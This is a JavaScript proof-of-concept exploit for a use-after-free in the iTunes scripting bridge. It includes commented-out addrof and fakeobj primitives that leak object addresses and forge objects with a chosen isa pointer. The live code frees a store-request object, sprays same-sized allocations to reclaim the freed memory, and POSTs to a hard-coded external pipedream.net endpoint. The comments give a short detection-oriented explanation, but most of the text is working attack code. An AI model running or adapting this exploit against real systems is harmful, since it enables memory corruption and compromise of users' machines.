// var i; function addrof(obj) { const saved = iTunes.scriptWindowContext(); iTunes.setScriptWindowContext_(obj); try { iTunes.window; } catch(e) { const match = /instance (0x[\da-f]+)$/i.exec(e); if (match) return match[1]; throw new Error('Unable to leak addr'); } finally { iTunes.setScriptWindowContext_(saved); } } function fakeobj(size, data, isa) { var total_size = size + 4, isa_string = isa.toString(); // alloc an SUScriptXMLHTTPStoreRequest const w = iTunes.makeXMLHTTPStoreRequest(); const req = iTunes.createFacebookRequest('http://', 'GET'); // malloc_size(SUScriptXMLHTTPStoreRequest) == total_size const uri = str2DataUri(makeStr(total_size)); // avoid GC window.w = w; window.req = req; // get a dangling pointer w.dealloc(); for (i = 0; i < total_size + 4; i++) { if (i >= size) { req.addMultiPartData(uri, parseInt(isa_string[i - size] + isa_string[i - size + 1]), 'B'); i++; } else req.addMultiPartData(uri, data[i], 'B'); } // If this doesn't work, try w();, w, xhttp.send(w), return w, and/or w(). return w; }  const a = []; for (i = 0; i < 32; i++) a[i] = 'A'; var xhttp = new XMLHttpRequest(); xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true); xhttp.send(fakeobj(192, a, 0x41414141)); */

// Minimal use-after-free proof of concept against the iTunes scripting bridge
// (the fuller addrof/fakeobj variant above is left commented out): a native
// scripting object is released via dealloc() while its JS wrapper `w` stays
// reachable, then same-sized allocations are made so the freed block is reused.
// From a detection standpoint the distinctive sequence is an explicit dealloc()
// on a scripting object immediately followed by a burst of equal-sized
// allocations, together with an outbound POST to a hard-coded non-Apple host
// (pipedream.net). `str2DataUri` and `makeStr` are defined outside this listing.

// alloc an SUScriptXMLHTTPStoreRequest
const w = iTunes.makeXMLHTTPStoreRequest();
// request object whose addMultiPartData() calls drive the allocations below
const req = iTunes.createFacebookRequest('http://', 'GET');
// malloc_size(SUScriptXMLHTTPStoreRequest) == 192
// (claimed by the original author; the 192-byte payload is sized to match)
const uri = str2DataUri(makeStr(192));
// avoid GC: pin both wrappers on the global object so the engine does not
// collect them while the native side is being manipulated
window.w = w;
window.req = req;
w.dealloc(); // get a dangling pointer: native object freed, wrapper `w` still live
for (let i = 0; i < 32; i++) // reclaim the memory
    req.addMultiPartData(uri, 'A', 'B'); // only the first arg matters
// Hard-coded external endpoint; the body sent here is the literal 0, so this
// request carries no leaked data — presumably it acts as a trigger/beacon only.
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true);
xhttp.send(0);